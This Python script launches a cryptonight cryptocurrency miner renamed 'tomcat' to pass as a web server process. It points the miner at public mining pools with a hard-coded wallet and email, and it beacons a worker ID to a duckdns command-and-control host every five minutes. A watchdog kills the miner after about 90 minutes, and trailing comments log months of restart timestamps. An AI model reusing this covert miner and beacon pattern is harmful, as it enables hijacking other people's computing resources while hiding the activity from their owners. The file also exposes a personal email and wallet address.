import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:44:01.466256
#2018-02-17 17:32:07.430064
#2018-02-17 19:20:04.758081
#2018-02-17 21:10:08.917429
#2018-02-17 22:55:06.773220
#2018-02-18 00:41:06.245148
#2018-02-18 02:30:08.049016
#2018-02-18 04:17:06.234480
#2018-02-18 06:07:01.830031
#2018-02-18 07:57:01.827144
#2018-02-18 09:44:08.619465
#2018-02-18 11:31:07.038775
#2018-02-18 13:16:03.846051
#2018-02-18 15:06:06.553022
#2018-02-18 16:53:01.848531
#2018-02-18 18:42:05.100124
#2018-02-18 20:29:01.303272
#2018-02-18 22:14:06.909470
#2018-02-19 00:03:07.235960
#2018-02-19 01:48:07.282642
#2018-02-19 03:35:09.183510
#2018-02-19 05:20:08.205327
#2018-02-19 07:09:06.395652
#2018-02-19 08:57:07.870232
#2018-02-19 10:47:04.670897
#2018-02-19 12:35:08.056291
#2018-02-19 14:23:01.722064
#2018-02-19 16:13:09.628857
#2018-02-19 17:59:06.803694
#2018-02-19 19:47:01.467484
#2018-02-19 21:36:02.056638
#2018-02-19 23:22:04.611335
#2018-02-20 01:08:07.192807
#2018-02-20 02:56:08.583959
#2018-02-20 04:45:08.100948
#2018-02-20 06:29:07.258163
#2018-02-20 08:13:05.594211
#2018-02-20 09:59:03.935861
#2018-02-20 11:43:06.006539
#2018-02-20 13:31:04.952814
#2018-02-20 15:15:01.444061
#2018-02-20 16:59:02.148273
#2018-02-20 18:47:04.711121
#2018-02-20 20:36:05.952958
#2018-02-20 22:22:05.590320
#2018-02-21 00:03:01.887748
#2018-02-21 01:50:07.881652
#2018-02-21 03:37:01.773509
#2018-02-21 05:26:07.089772
#2018-02-21 07:14:01.291909
#2018-02-21 09:00:08.972054
#2018-02-21 10:48:05.986639
#2018-02-21 12:34:08.631868
#2018-02-21 14:22:06.919420
#2018-02-21 16:09:01.768655
#2018-02-21 17:59:04.019993
#2018-02-21 19:48:01.557150
#2018-02-21 21:36:05.223659
#2018-02-21 23:24:06.400056
#2018-02-22 01:14:06.431469
#2018-02-22 03:03:01.331190
#2018-02-22 04:48:08.322851
#2018-02-22 06:34:07.668406
#2018-02-22 08:22:06.125180
#2018-02-22 10:10:05.524707
#2018-02-22 11:55:11.549880
#2018-02-22 13:41:06.524115
#2018-02-22 15:28:06.304584
#2018-02-22 17:15:08.146811
#2018-02-22 19:02:08.701787
#2018-02-22 20:54:04.845946
#2018-02-22 22:39:08.087860
#2018-02-23 00:27:06.331078
#2018-02-23 02:13:08.375898
#2018-02-23 04:03:01.270281
#2018-02-23 05:48:07.152352
#2018-02-23 07:36:07.909057
#2018-02-23 09:40:07.435945
#2018-02-23 11:44:04.328547
#2018-02-23 13:34:04.103979
#2018-02-23 15:21:06.012800
#2018-02-23 17:08:06.271772
#2018-02-23 18:37:08.578057
#2018-02-23 20:20:04.427370
#2018-02-23 21:56:06.753665
#2018-02-23 23:31:07.389207
#2018-02-24 00:58:02.068734
#2018-02-24 02:47:05.166272
#2018-02-24 04:39:07.402592
#2018-02-24 06:23:07.144202
#2018-02-24 08:11:05.323081
#2018-02-24 09:55:06.249388
#2018-02-24 11:49:04.437369
#2018-02-24 13:42:01.706492
#2018-02-24 15:29:07.138693
#2018-02-24 17:23:04.112506
#2018-02-24 19:11:05.228789
#2018-02-24 21:00:01.826055
#2018-02-24 23:29:07.180381
#2018-02-25 02:54:01.745460
#2018-02-25 06:32:03.768755